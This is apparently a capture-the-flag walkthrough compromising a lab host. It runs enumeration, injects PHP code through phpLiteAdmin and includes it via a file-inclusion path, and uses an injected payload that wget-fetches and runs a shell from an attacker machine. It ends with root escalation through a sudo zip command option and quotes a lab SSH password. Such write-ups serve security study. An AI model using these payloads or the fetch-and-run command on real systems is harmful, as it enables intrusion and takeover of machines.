We start scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv
Dirb came with these directories
We are interested in http://192.168.1.5/dbadmin as you can login using the default password admin
Searching search sploit for phpLiteAdmin
Now the Remote PHP Code Injection is about creating a new database with the name hack ( from the left ) and click create, choose the database we created and from the middle panel choose a name with hack ahs numbers of fields 1, click go
now name the field hack and choose typt TEXT and in the value put <?php system(“uname -a”); ?>
Now go to http://192.168.1.5/view.php?page=../../usr/databases/hack to get a result from the code we’ve put
We can modify the script and use Metasploit so get a shell
Open a listening port and open a connections to your machine using:
Python –m SimpleHTTPServer 80
Now modify the scipt to be ‘<?php system (“cd /tmp; wget http://192.168.1.11/shell; chmod +x shell; ./shell”); ?>’
Changing directories to /home/zico/wordpress an viewing config.php found a username and password and used them to login to ssh, user zico pass sWfCsfJSPV9H3AmQzw8
Running this command give us a root shell, first go to tmp folder and create any file with touch command then:
Sudo zip newfile.zip newfile –T –unzip-command=”sh –c /bin/bash”
